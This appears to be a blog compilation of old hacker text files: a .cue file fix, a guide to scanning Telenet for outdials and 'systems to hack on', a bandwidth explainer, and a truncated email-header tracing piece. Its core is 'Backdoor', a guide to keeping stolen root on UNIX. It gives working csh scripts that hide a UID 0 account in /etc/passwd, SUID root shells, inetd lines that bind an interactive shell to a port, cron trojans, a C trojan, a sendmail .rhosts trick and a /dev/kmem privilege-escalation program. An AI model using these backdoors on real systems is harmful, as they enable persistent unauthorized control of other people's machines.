FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00

Delete everything in the quotes, in this case we would
delete name of file.bin. Now place the title you copied
in between the quotes. Save the changes and close out.
Thats it, your .cue file should work now.

OTHER WAYS TO USE .BIN & .CUE FILES

VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.

Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.

ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________

BASIC NETWORKING

noreply@blogger.com (Agung Prasetiawan,) — Tue, 27 Dec 2016 07:21:00 +0000

Well, many people have asked me "how do i use Telenet".."how do i use an outdial". Well i have decided to write a very basic file on telenet and how to get around on the networks.

     Well Telenet and others are PSN's or (Packet Switching Networks) these nets are connected to many other networks around the world. You can do alot with just basic knowledge that i have (most of you will know this and way beyond what i know but some will benefit from it) i will start with some of the terms that are often used with these services.

Access Number- The direct number that you dial to access a network (duh).

Nua (Network Users Address) - An Nua is basicly a number you type in to access that particular service think of an Nua as a phone number sorta its not an actually phone number with an Acn country code or whatever because the service is connected to the network world wide. I hope that was fairly clear let me show this think of the planet earth as an network and to reach the services on the planet you call the phone number like the service is a persons residence or business phone or payphone whatever just like on a network an Nua is the Address to a system or outdial whatever on the particular network. I hope this is clear or atleast somewhat understood.

Nui (Network User Identification) - An Nui is like a Account and Password to the network like an account and password is to a bbs that lets you access the system. Some people use Nui for like anything like an Vax system Unix systems they are referring to an Nui as basicly a account on the particular system that lets you use the system.

DNIC (Data Network Identification Code) - The DNIC is like a 4 digit code that represents what Psn it is think of an DNIC like an AreaCode and the Nua the individual phone number.

Outdial - Is basicly what it says an modem port connected somewhere on the network that will allow you to dial out from and connect data only to a actually phone number not an Nua.

Pad (Packet Assemble Disassembler) - an x.25 pad is very useful an pad using x.25. protocal transmits at 9600 bps to an Nua. This may sound funny but i call them "Launch Pads" heh like with an x.25 you can usally access any Nua on the planet by usally typing the Dnic+Nua.

       Now i will explain various things and give helpful ideas.

     Let me start off with some helpful things for you to try and do.

                                 TeleNet


     The first thing your going to have to have is your Access number it is very easy to get your local access number. Simply call telenet at 1-800-TELENET that is thier customer service number and ask for your dialup the operator will ask for your area code and prefix of your phone number he/she will also ask your baud rate. There are many telenet ports across the country and internationly with varying baud rates from 110 bps (yuck) to 9600 (i wish i had) so you will want your maximum baud port most locations have atleast 1200 many have 2400 and not alot have 9600 ports like for big cities like Detroit and Los Angeles at the end of the file i will list some useful numbers.
Some things to do while online with Telenet and Tymnet. While at the @ on the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail" this access's telenets mail system simple entitled "Telemail" from there it will ask "user name" or something like that type "phones" next it will prompt you "password" enter "phones". The phones service has alot of worthy information it will give you a menu to choose from the rest should be self explanatory. Along with the other information on the phones service there is a complete updated list of all Telenet access numbers which is conveinent. Once you have tried the phones service also on telemail enter "Intl/Associates" as the user name and "Intl" for the international access numbers. If you are calling from overseas somewhere connect with an telenet access number then type this Nua at the telenet @ prompt "311020200142" and enter the username and password.
You might want to pick up a sort of a reference booklet on Telenet simply again call the customer service number and ask them for "How to use Telenet's Asychronus Dial Service" and give them your address which is self explanatory.
Another tidbit of info you would like to know if you already didnt know that Telenet is owned by Us Sprint long distance service.

                               Tymnet

     The same goes for Tymnet service you will first need an Access Number. Simply call Tymnet customer service at 1-800-872-7654 and ask them. Again you might like to get Tymnets reference booklet on how to use there system simply again ask them to send it to you. Once online with a Tymnet access number type "Information" at the user name prompt and you will be connected to another nice thing on tymnet which you have access to all thier Access Numbers also just like the "phones" service on Telenet. Tymnet is owned by "Mcdowell Douglas" corporation. Unlike Telenet where a long distance company owns the network. On Tymnet in the "Information" service there is a very cool option that will provide you with all the Dnic's (Networks) available from Tymnet. You may also want to get that on buffer but for your conveinience i will include a copy of that. The file "Basic.NetworksII" is the complete listing and i would like the Basic.NetworksII file to be accompanied by this file for the most part.

                            Outdials

     Now i will discuss Outdials and tell how to use them. An Outdial on Telenet is an Pcp Port usally. It will enable you to connect data with a carrier. An Outdial is a modem connected up to the network to access the outdial spimply type the outdials Nua. Usally you will need a Nui or Pad to use an Outdial on Telenet just to let you know. Once connected to an Outdial on Telenet type "Ctrl-e" to get into the command mode of the Outdial or if your sharp on your Hayes modem AT command set just issue the commands thru the Outdial besure to type "Atz" when logged in to reset the modem parameters to default values. Outdials range from different baud rates just like what kind of modem is hooked into the Outdial port. This is the basic Telenet Outdial but there are many types a Tymnet Asychronus is a very good Outdial to use like i said there are many different types the above is for Telenet Pcp Outdials which are used most widely.

                        Scanning Telenet

     Well now i will explain how to scan telenet and how to find Pcp outdials etc. When scanning telenet call your Access Number and at the prompt enter the Nua. Plan to scan a certain amount of Nua's in a session wether the number is up to you, usally when i scan i scan in blocks of 100 you can find alot of things while scanning. I will tell how to find pcp outdials, first if your looking for a particular area code for the outdial take the 313 area code for example usally an outdial is in the first 150 numbers scanned so i would suggest if scanning for outdials scan like this..the area code for which you want the outdial two 0's then a three digit number so the scan would look like this...31300001,31300002,31300003 etc.. im sure you get it...along the way you will probably find other neat things. Some things to know when scanning telenet is when you enter an Nua and it freezes like wont do anything send a break signal, for me i use Proterm for the Apple the break signal is open-apple b once the break signal is sent it should go back to a @ prompt again. If you try scanning another nua directly after you broke out from the frozen portion Telenet will give you an error message "Connection Pending" which means it is still looking for the Nua system from which you requested previously. To remedy this situation after the break signal is sent type "d" for disconnect it will then tell you the connection has been terminated. Proceed scanning the Nua continuing where you left off. (Note. you will get the freeze and have to repeat the sequence over and over again as of there are A LOT of Nuas that freeze) Well i bet your asking "how do i know when ive found an outdial?" usally Telenet will respond with a connect message and then nothing try to type "Atz" if it responds "ok" then you have a Outdial port where as Atz is the hayes modem command for reseting the modems paramaters to default settings. Ok now i will explain some things to look for and some wise things to do while scanning and also supply an response key explanations.
Whenever you "Connected" to an Nua write it down no matter what it is make notes of what you find and label them for instance if you encounter any of these messages.

   User Name = a Vax System
   Login = a Unix system
   Primenet = a prime system
   Password = something worth noting

Basicly anything that connects take note of this is very useful for finding systems to hack on even though most or all of Telenet has been scanned at one time or another there are always somethings to do! that is a FACT! Be sure to write down all "Refused Collect Connection" also because we must not forget that when we request an Nua that we are asking for a collect call all Nuas inputed on Telenet without an Nui are being paid for by the particlar system requested that is why when an Outdials Nua is requested without any sort of Pad,Nui etc. it will not excecpt the call in all cases i have encountered

Here is a list of Network Messages that Telenet will respond with remember these are for any type of Telenet access the following may appear and a completed explanation.

        @ is the network command prompt

        ? the last entry was invalid

        Access Bared - Your connection request does not allow you to                 connect to this system

        Access to This Address not permitted - Your Nui is not authorized to            access the address you typed

        Attempt Aborted - You enterd the disconnect command (as we said before          when it freezes when scanning)

        Busy - All the ports,destinations are in use try again later

        Collect Wats Call Not Permitted - Collect Wats calls not permitted by           your host or authorized by your Nui

        Connected - Your terminal has been connected to the Nua system you              requested

        Connection From - Your terminal has been called by another computer or          terminal

        Connection Pending - The Network is try to establish a connection with          the Nua you requested (enter the d command or "bye" to disconnect the           attempt)

        Disconnected - Your terminal has been disconnected from the terminal            you called

        Enhanced Network Services System Error - Your call couldnt be                 validated contact customer service

        Enhanced Network services unavailable at this time - Serivce is                 temporarily unavailable try again later

        Illegal Address - enter the Connect sequence again whether it be an Nua         or a system name

        Invalid Charge Request - your payment selection is not valid

        Invalid User Id or Password - The Nui you entered is not valid

        Local Congestion - Your local Access number is busy try again in a              couple minutes

        Local Disconnect - Your Terminal has been disconnected

        Local Network Outage - A temporary problem is preventing you from using         the network

        Local Procedure Error - Communication problems by the network caused            the network to clear your call

        Not Available,Not Operating,Not Responding - Your Computer cannot              accept your request for connection try later

        Not Connected - You have entered a command thai s only valid when               connected to a system type "cont" to be brought back into the                 connection

        Not Reachable - A temporary conditon prevents you from using the                network

        Password - This is the prompt which apprears after youve entered an Nui

        *** Possible Data Loss - connecton has been reset

        Refused Collect Connection - Your payment selection must be prepaid

        Rejecting - Host copmputer refuses to accept the call

        Remote Procedure Error - Communication problems forced the network to           clear our call

        Still Connected - You requested another service while your online to            another

        Telenet XXX XXX - Network Port you are using

        Terminal - This is the terminal type prompt

        Unable to validate call - Your Nui has been temporarily disbaled

        Unable to validate call contact admin - The Nui has been permently              disabled

        Unknown Adress - Your Nua may be invalid

        Wats Call not permitted - Telenet In-wats calls are not permitted by            your host or your Nui

Well that is the end of the Telenet messages and this is the end of our file only left is the numbers i have and some other usual stuff

Telenet Customer service 1-800-TELENET
Tymnet Customer service 1-800-872-7654
Telenet Access # 313/964-2988 1200 bps 313/963-2274 2400 313/964-3133 9600 bps
Tymnet Access# 313/962-2870
Global Outdial at 20200123

Well that is about it id like to greet some people here SoldierOfFortune,Frodo,TheBit,Hellraiser,Icecube,Slaytanic,Corrupt,Lorax,Deadman#The Disk Master,The Hunter,DPAK,MOD,Rat,The Traxster,The Apple Bandit,El Cid,Shadow,Blue Adept,Blacknight,LOD,HALE,DungeonMaster,Blackbeard,Kilroy,The Whole Interchat scene,All my buddys from the alliances,Gambler,Sabers Edge,Misfit,The Flash,Qsd friends,All the people who called my Vmb'z for "Rad Infoz" and helped to keep it going and all the whole people you make a difference "All you Kids out There keep the Faith!"

I can be reached on Funtime Gs at 305-989-0181 d215*guest is the new user pass
I can be reached at this Vmb 313-980-5632
and soon im going to be running a bbs with a friend of mine so be sure to look for that like i said im outta here Slaytze!!!!

Text-Files 2:

BandWidth Explained

noreply@blogger.com (Agung Prasetiawan,) — Mon, 26 Dec 2016 07:20:00 +0000

This is well written explanation about bandwidth, very useful info.

BandWidth Explained

Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.

Network Connectivity

The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.

If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).

Traffic

A very simple analogy to use to understand bandwidth and traffic is to think of highways and cars. Bandwidth is the number of lanes on the highway and traffic is the number of cars on the highway. If you are the only car on a highway, you can travel very quickly. If you are stuck in the middle of rush hour, you may travel very slowly since all of the lanes are being used up.

Traffic is simply the number of bits that are transferred on network connections. It is easiest to understand traffic using examples. One Gigabyte is 2 to the 30th power (1,073,741,824) bytes. One gigabyte is equal to 1,024 megabytes. To put this in perspective, it takes one byte to store one character. Imagine 100 file cabinets in a building, each of these cabinets holds 1000 folders. Each folder has 100 papers. Each paper contains 100 characters - A GB is all the characters in the building. An MP3 song is about 4MB, the same song in wav format is about 40MB, a full length movie can be 800MB to 1000MB (1000MB = 1GB).

If you were to transfer this MP3 song from a web site to your computer, you would create 4MB of traffic between the web site you are downloading from and your computer. Depending upon the network connection between the web site and the internet, the transfer may occur very quickly, or it could take time if other people are also downloading files at the same time. If, for example, the web site you download from has a 10MB connection to the internet, and you are the only person accessing that web site to download your MP3, your 4MB file will be the only traffic on that web site. However, if three people are all downloading that same MP at the same time, 12MB (3 x 4MB) of traffic has been created. Because in this example, the host only has 10MB of bandwidth, someone will have to wait. The network equipment at the hosting company will cycle through each person downloading the file and transfer a small portion at a time so each person's file transfer can take place, but the transfer for everyone downloading the file will be slower. If 100 people all came to the site and downloaded the MP3 at the same time, the transfers would be extremely slow. If the host wanted to decrease the time it took to download files simultaneously, it could increase the bandwidth of their internet connection (at a cost due to upgrading equipment).

Hosting Bandwidth

In the example above, we discussed traffic in terms of downloading an MP3 file. However, each time you visit a web site, you are creating traffic, because in order to view that web page on your computer, the web page is first downloaded to your computer (between the web site and you) which is then displayed using your browser software (Internet Explorer, Netscape, etc.) . The page itself is simply a file that creates traffic just like the MP3 file in the example above (however, a web page is usually much smaller than a music file).

A web page may be very small or large depending upon the amount of text and the number and quality of images integrated within the web page. For example, the home page for CNN.com is about 200KB (200 Kilobytes = 200,000 bytes = 1,600,000 bits). This is typically large for a web page. In comparison, Yahoo's home page is about 70KB.

How Much Bandwidth Is Enough?

It depends (don't you hate that answer). But in truth, it does. Since bandwidth is a significant determinant of hosting plan prices, you should take time to determine just how much is right for you. Almost all hosting plans have bandwidth requirements measured in months, so you need to estimate the amount of bandwidth that will be required by your site on a monthly basis

If you do not intend to provide file download capability from your site, the formula for calculating bandwidth is fairly straightforward:

Average Daily Visitors x Average Page Views x Average Page Size x 31 x Fudge Factor

If you intend to allow people to download files from your site, your bandwidth calculation should be:

[(Average Daily Visitors x Average Page Views x Average Page Size) +
(Average Daily File Downloads x Average File Size)] x 31 x Fudge Factor

Let us examine each item in the formula:

Average Daily Visitors - The number of people you expect to visit your site, on average, each day. Depending upon how you market your site, this number could be from 1 to 1,000,000.

Average Page Views - On average, the number of web pages you expect a person to view. If you have 50 web pages in your web site, an average person may only view 5 of those pages each time they visit.

Average Page Size - The average size of your web pages, in Kilobytes (KB). If you have already designed your site, you can calculate this directly.

Average Daily File Downloads - The number of downloads you expect to occur on your site. This is a function of the numbers of visitors and how many times a visitor downloads a file, on average, each day.

Average File Size - Average file size of files that are downloadable from your site. Similar to your web pages, if you already know which files can be downloaded, you can calculate this directly.

Fudge Factor - A number greater than 1. Using 1.5 would be safe, which assumes that your estimate is off by 50%. However, if you were very unsure, you could use 2 or 3 to ensure that your bandwidth requirements are more than met.

Usually, hosting plans offer bandwidth in terms of Gigabytes (GB) per month. This is why our formula takes daily averages and multiplies them by 31.

Summary

Most personal or small business sites will not need more than 1GB of bandwidth per month. If you have a web site that is composed of static web pages and you expect little traffic to your site on a daily basis, go with a low bandwidth plan. If you go over the amount of bandwidth allocated in your plan, your hosting company could charge you over usage fees, so if you think the traffic to your site will be significant, you may want to go through the calculations above to estimate the amount of bandwidth required in a hosting plan.

Backdoor

noreply@blogger.com (Agung Prasetiawan,) — Sun, 25 Dec 2016 07:18:00 +0000

Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?

This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.

Beforehand

Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...

The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.

The Overt

[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...

#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd                                      # Do this at home.
cp /etc/passwd ./temppass               # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1                     # we only want 2 temp files
echo Creating two files, $linecount[1] lines each $or approximately that$.
split -$linecount[1] ./temppass         # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd                   # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

NEVER, EVER, change the root password. The reasons are obvious.

[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).

[3] Leave an SUID root shell in /tmp.

#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.evilnaughtyshell      # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.

The Veiled

[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:

(1)     (2)     (3)     (4)     (5)     (6)             (7)
ftp     stream tcp     nowait root    /usr/etc/ftpd   ftpd
talk    dgram   udp     wait    root    /usr/etc/ntalkd ntalkd

Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:

Open the /etc/inetd.conf in an available editor. Find the line that reads:


        daytime stream tcp     nowait root    internal

and change it to:

        daytime stream tcp     nowait /bin/sh sh -i.

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).

[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

(1)       (2)/(3)          (4)
smtp      25/tcp           mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:

        evil    22/tcp          evil

and this line to /etc/inetd.conf:

        evil    stream tcp     nowait /bin/sh sh -i

Restart inetd as before.

Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.

[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:

(1)     (2)     (3)     (4)     (5)     (6)
0       0       *       *       1       /usr/bin/updatedb

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:

        0       0       *       *       *       /usr/bin/trojancode

This is the shell script:

#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
#daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then                        # Is he there?

        set linecount = `wc -l /etc/passwd`
        cd                                      # Do this at home.
        cp /etc/passwd ./temppass               # Safety first.
        @ linecount[1] /= 2
        @ linecount[1] += 1                     # we only want 2 temp files
        split -$linecount[1] ./temppass         # passwd string optional
        echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
        cat ./xab >> ./xaa
        mv ./xaa /etc/passwd
        chmod 644 /etc/passwd                   # or whatever it was beforehand
        rm ./xa* ./temppass
        echo Done...
else
endif

[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:

        29      2       *       *       *       /bin/usr/sneakysneaky_passwd

make sure this exists:

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky

and this is the simple shell script:

#!/bin/csh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com

cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd

[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.

/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* daemon9@netcom.com */

#include

#define KEYWORD "industry3"
#define BUFFERSIZE 10

int main(argc, argv)
int argc;
char *argv[];{

        int i=0;

        if(argv[1]){            /* we've got an argument, is it the keyword? */

                if(!(strcmp(KEYWORD,argv[1]))){

                                /* This is the trojan part. */
                        system("cp /bin/csh /bin/.swp121");
                        system("chown root /bin/.swp121");
                        system("chmod 4755 /bin/.swp121");
                }
        }
                                /* Put your possibly system specific trojan
                                   messages here */
                                /* Let's look like we're doing something... */
        printf("Sychronizing bitmap image records.");
        /* system("ls -alR / >& /dev/null > /dev/null&"); */
        for(;i<10;i++){
                fprintf(stderr,".");
                sleep(1);
        }
        printf("\nDone.\n");
        return(0);
} /* End main */

[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:

"decode: "|/usr/bin/uudecode"

to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.

#! /bin/csh

# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com

You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.

The Covert

[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.

The Esoteric

[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.

/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */

#include
#include
#include
#include
#include
#include
#include

#define KEYWORD "nomenclature1"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{

        int count, fd;
        long where, lseek();

        if(argv[1]){            /* we've got an argument, is it the keyword? */
                if(!(strcmp(KEYWORD,argv[1]))){
                        fd=(open("/dev/kmem",O_RDWR);

                        if(fd<0){
                                printf("Cannot read or write to /dev/kmem\n");
                                perror(argv);
                                exit(10);
                        }

                        userlocation=address();
                        where=(lseek(fd,userlocation,0);

                        if(where!=userlocation){
                                printf("Cannot seek to user page\n");
                                perror(argv);
                                exit(20);
                        }

                        count=read(fd,&userpage,sizeof(struct user));

                        if(count!=sizeof(struct user)){
                                printf("Cannot read user page\n");
                                perror(argv);
                                exit(30);
                        }

                        printf("Current UID: %d\n",userpage.u_ruid);
                        printf("Current GID: %d\n",userpage.g_ruid);

                        userpage.u_ruid=0;
                        userpage.u_rgid=0;

                        where=lseek(fd,userlocation,0);

                        if(where!=userlocation){
                                printf("Cannot seek to user page\n");
                                perror(argv);
                                exit(40);
                        }

                        write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

                        execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
                }
        }

} /* End main */

#include
#include
#include

#define LNULL ((LDFILE *)0)

long address(){

        LDFILE *object;
        SYMENT symbol;
        long idx=0;

        object=ldopen("/unix",LNULL);

        if(!object){
                fprintf(stderr,"Cannot open /unix.\n");
                exit(50);
        }

        for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
                if(!strcmp("_u",ldgetname(object,&symbol))){
                        fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
                        ldclose(object);
                        return(symbol.n_value);
                }
        }

        fprintf(stderr,"Cannot read symbol table in /unix.\n");
        exit(60);
}

[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:

chmod 666 /dev/kmem
sleep 300               # Nap for 5 minutes
chmod 600 /dev/kmem     # Or whatever it was before

From The Infinity Concept Issue II

Backtracking EMAIL Messages

noreply@blogger.com (Agung Prasetiawan,) — Sat, 24 Dec 2016 07:19:00 +0000

Backtracking EMAIL Messages

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Maricela Paulson" <s359dyxtt@yahoo.com>

Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

